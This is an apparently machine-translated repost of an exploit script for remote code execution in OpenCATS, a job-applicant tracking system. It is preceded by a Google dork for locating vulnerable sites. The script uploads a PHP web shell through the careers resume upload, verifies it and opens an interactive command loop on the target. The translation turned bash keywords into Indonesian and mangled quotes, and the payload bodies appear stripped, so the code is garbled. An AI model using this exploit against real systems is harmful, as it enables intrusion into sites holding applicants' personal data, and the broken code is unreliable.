[*]News.nextcloud.asia –
# Google Dork: intext:”Bukaan yang Tersedia Saat Ini, Pekerjaan yang Baru Diposting”
# Tanggal: 21/09/2021
# Eksploitasi Penulis: Nicholas Ferreira – https://github.com/Nickguitar
# Beranda Vendor: https://www.opencats.org/
# Tautan Perangkat Lunak: https://github.com/opencats/OpenCATS
# Versi: <=0.9.4 Hitung
# Diuji pada: Debian, CentOS, Windows Server
#!/bin/bash
jika [ $# -eq 0 ]
kemudian
echo “Penggunaan: $0
keluar
menjadi
# jika payload tidak berfungsi, coba yang lain
payload=’GIF87a‘
#payload=’GIF87a‘
#payload=’GIF87a‘
#payload=’GIF87a‘
#payload=’GIF87a‘
#payload=’GIF87a‘
#payload=’GIF87a‘
target=$1
hijau=”�33[0;32m”
red=”�33[0;31m”
reset=”�33[0m”
#====================== Functions
rev() {
while true
do echo -n -e “n$ “
read cmd
curl -skL -X POST -d “0=$cmd” $1 | sed “s/^GIF87a//” | sed “$ d”
done
}
upload() {
curl -skL $1/$2
-H “Connection: close”
-F [email protected]”$3;type=aplikasi/x-php”
-F ID=”$firstJb”
-F kandidatID=”-1″
-F applyToJobSubAction=”resumeLoad”
–dikompresi
–merasa tidak aman
}
getVersi() {
ver=`curl -skL $1 | grep -E “span.*([0-9].)+” | sed “s/<[^>]grep -Eo -m 1"[0-9].)+[0-9]*"`
jika [ -z “${ver}” ]
kemudian
ver=`curl -skL “$1/installtest.php” | grep -Eio “Versi CATS adalah ([0-9].)+[0-9]grep -Eo -m 1[0-9].)+[0-9]*”`
jika [ -z “${ver}” ]
kemudian
echo -e “${merah}[-] Tidak dapat mengidentifikasi versi CATS, tapi tidak apa-apa…${reset}”
kembali 0
menjadi
menjadi
echo -e “${hijau}[*] Versi terdeteksi: $ver${reset}”
}
tulisPayload(){
tmpfile=$(tr -dc A-Za-z0-9 file=`nama dasar $tmpfile`
echo “$1” > $tmpfile
}
spanduk(){
echo “IF8uXyAgICAgXywtJyIiYC0uXyAKKCwtLmAuXywnKCAgICAgICB8XGAtL3wgICAgICAgIFJldkNBVCAtIE9wZW5DQVQgUkNFCiAgICBgLS4tJyBcICktYCggLCBvIG8pICAgICAgICAgTmljaG9sYXMgIEZlcnJlaXJhCiAgICAgICAgICBgLSAgICBcYF9gIictICAgaHR0cHM6Ly9naXRodWIuY29tL05pY2tndWl0YXI =” | base64 -d
dibuat di”
}
#========================
spanduk
gema “[*] Menyerang target $target”
gema “[*] Memeriksa versi CATS…”
getVersi $target
#keluar
gema “[*] Membuat file temp dengan payload…”
tulisPayload “$payload”
#keluar
gema “[*] Memeriksa pekerjaan yang aktif…”
jbRequest=`curl -skL $target’/careers/index.php?m=careers&p=showAll’`
numJb=`echo “$jbRequest” | grep “Pekerjaan yang Diposting” |sed -E ‘s/.*: ([0-9]+).*/1/’`
firstJb=`echo “$jbRequest” | grep -m 1 ‘
jika [[ ! $numJb -gt 0 ]]
kemudian
echo -e “${merah}[-] Tidak ada pekerjaan aktif yang ditemukan.${reset}”
gema “[*] Mencoba jalan lain…”
jbRequest=`curl -skL $target’/index.php?m=careers&p=showAll’`
numJb=`echo “$jbRequest” | grep “Pekerjaan yang Diposting” | sed -e ‘s/<[^>]*>//g’ | sed -E ‘s/.*Pekerjaan yang Diposting.*: ([0-9]+).*/1/’`
jika [[ ! $numJb -gt 0 ]]
kemudian
echo -e “${merah}[-] Tidak dapat menemukan pekerjaan aktif.${reset}”
keluar
menjadi
menjadi
firstJb=`echo “$jbRequest” | grep -m 1 ‘
echo -e “${hijau}[+] Pekerjaan ditemukan! Menggunakan id pekerjaan $firstJb${reset}”
gema “[*] Mengirim muatan…”
req=`upload “$target” “/careers/index.php?m=careers&p=onApplyToJobOrder” “$tmpfile”`
jika ! `echo “$req” | egrep -q “masih diupload|akan diupload|$file”`
kemudian
echo -e “${merah}[-] Tidak dapat mendeteksi apakah payload telah diunggah${reset}”
gema “[*] Memeriksa dengan metode lain…”
sed -i “s/GIF87a//” $tmpfile
req=`upload “$target” “index.php?m=careers&p=onApplyToJobOrder” “$tmpfile”`
jika ! `echo “$req” | egrep -q “masih diupload|akan diupload|$file”`
kemudian
echo -e “${merah}[-] Tidak dapat mengunggah payload…${reset}”
keluar
menjadi
menjadi
echo -e “${hijau}[+] Muat $file diunggah!”
gema “[*] Menghapus file temp yang dibuat…”
rm $tmpfile
gema “[*] Memeriksa cangkang … “
check=$(curl -skL -d ‘0=echo 0x7359’ “$target/upload/careerportaladd/$file”)
if `echo $check | grep -q “0x7359″`
kemudian
echo -e “${hijau}[+] Punya cangkang! :D${setel ulang}”
curl -skL -X POST -d “0=id;uname -a” “$target/upload/careerportaladd/$file” | sed “s/^GIF87a//” | sed “$ d”
rev $target/upload/careerportaladd/$file
kalau tidak
echo -e “${merah}[-] Tidak bisa mendapatkan shell terbalik.n Mungkin Anda harus mencobanya secara manual atau menggunakan payload lain.${reset}”
menjadi
Pos terkait
